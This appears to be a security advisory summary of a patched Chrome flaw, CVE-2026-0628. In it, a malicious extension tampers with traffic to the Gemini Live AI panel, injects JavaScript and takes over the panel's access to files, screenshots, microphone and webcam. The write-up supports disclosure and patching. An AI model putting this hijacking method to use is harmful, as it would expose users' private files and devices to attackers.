Full Report
High-severity flaw let malicious add-ons access system via browser's embedded AI feature Security boffins have discovered a high-severity bug in Google Chrome that allowed malicious extensions to hijack its Gemini Live AI panel and inherit privileges they were never meant to have.…
Analysis Summary
# Vulnerability: Malicious Chrome Extensions Hijack Gemini Live Panel Privileges
## CVE Details
- CVE ID: CVE-2026-0628
- CVSS Score: High-severity (Specific score not provided in the text)
- CWE: Insufficient Isolation/Improper Privilege Management (Inferred)
## Affected Systems
- Products: Google Chrome (Desktop versions)
- Versions: Versions prior to 143.0.7499.192 and 143.0.7499.193
- Configurations: Systems utilizing the embedded Gemini Live AI panel feature.
## Vulnerability Description
A high-severity flaw was discovered in Google Chrome that allowed malicious extensions to hijack the Gemini Live AI side panel. This involved exploiting how Chrome handles extension network rules, enabling a rogue extension (even one with standard permissions) to intercept and tamper with traffic destined for the trusted Gemini panel. By successfully injecting its own JavaScript, the extension inherited the elevated privileges granted to the Gemini feature, which inherently has access to sensitive system resources like reading local files, taking screenshots, and activating the microphone/webcam.
## Exploitation
- Status: Not explicitly stated if exploited in the wild; researchers identified and reported the flaw (Unit 42).
- Complexity: Low/Medium (Implied minimal permissions required for the extension).
- Attack Vector: Network (via intercepted extension traffic)
## Impact
- Confidentiality: High (Access to local files, ability to 'sift through local files').
- Integrity: High (Ability to perform actions on the user's behalf, e.g., slipping phishing messages).
- Availability: Low (Direct availability impact not specified, but system disruption is possible).
## Remediation
### Patches
- Google fixed the bug in early January 2026.
- Patches are available in:
- Chrome 143.0.7499.192 (desktop)
- Chrome 143.0.7499.193 (desktop)
### Workarounds
- Users are covered if they are running a current version (post-patch). No specific temporary workarounds were detailed, implying immediate patching is the required step.
## Detection
- Detection methods specific to this traffic hijacking were not detailed in the summary.
- **Indicator of Compromise (Conceptual):** Unintended system actions initiated via the Gemini panel (e.g., unexpected webcam activation, unusual file access requests originating from the AI feature context).
## References
- Vendor Advisory (Implied): Google Stable Channel Update (January 2026) - link defanged: hxttps://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop.html
- Researcher Disclosure: Unit 42 report - link defanged: hxttps://unit42.paloaltonetworks.com/gemini-live-in-chrome-hijacking/